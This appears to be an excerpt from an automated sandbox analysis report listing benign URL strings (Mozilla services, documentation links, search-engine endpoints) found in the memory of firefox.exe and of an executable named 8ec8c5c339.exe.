Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xultoolbar-context-menu-bookmarks-show-oth
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml);
Source: 8ec8c5c339.exe, 00000008.00000002.2758711410.000000001CA62000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2779246693.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000018.00000003.2609028189.00000238F712E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608033351.00000238F6F00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2612170664.00000238F7144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2639277438.00000238F715B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3326407807.0000028631538000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecop
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecopnacl
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgcreateContentPrincipalFromOriginchrome://browser/skin/menu.svgdevice-conne
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgl
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3815000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etpexecuteIDB/promise
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000023.00000002.3317049922.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2843731239.0000028630CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180D
Source: firefox.exe, 00000023.00000002.3108413567.000002862DAA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180Required
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1403293
Source: firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1592344
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2608317826.00000238F7118000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000023.00000002.3337329658.0000028631F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 8ec8c5c339.exe, 00000008.00000002.2772437100.0000000028AA1000.00000004.00000020.00020000.00000000.sdmp, 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2628599943.00000238F2EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2644160751.000001F4143C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000023.00000002.2938979510.0000028621A0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2837667745.00000286321A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2841500368.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.00000286321A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2821841158.000002862E033000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsInt
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsTre
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/css-lists-3/#ua-stylesheet
Source: firefox.exe, 00000023.00000002.3321697398.0000028631021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drafts.csswg.org/css-scoping/#slots-in-shadow-tree
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.000002863107C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 8ec8c5c339.exe, 00000008.00000002.2741806930.0000000002515000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630286434.00000238F3482000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000018.00000002.2636379005.00000238F52B7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2637577931.00000238F6903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2631652987.00000238F387B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2630851621.00000238F372C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3168184572.000002862DC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3321697398.00000286310AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000018.00000002.2636379005.00000238F5289000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.2911410230.000002863BF68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/d8e772fe-4909-4f05-9f9
Source: firefox.exe, 00000023.00000002.3338983377.000002863207E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000018.00000002.2630851621.00000238F3709000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2598025146.00000238F3712000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3306154976.000002862E895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsm
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsmr
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3339527137.0000028632103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000023.00000002.3339527137.0000028632103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000023.00000002.3345818206.0000028632403000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsi
Source: firefox.exe, 00000023.00000002.3108413567.000002862DA03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Parent
Source: firefox.exe, 00000018.00000002.2631652987.00000238F3803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Sending
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 00000023.00000002.3025589583.000002862D495000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 00000023.00000002.3321697398.0000028631045000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000018.00000002.2637437309.00000238F5800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2645119207.000001F414400000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000023.00000002.2978941920.000002862D252000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.comU
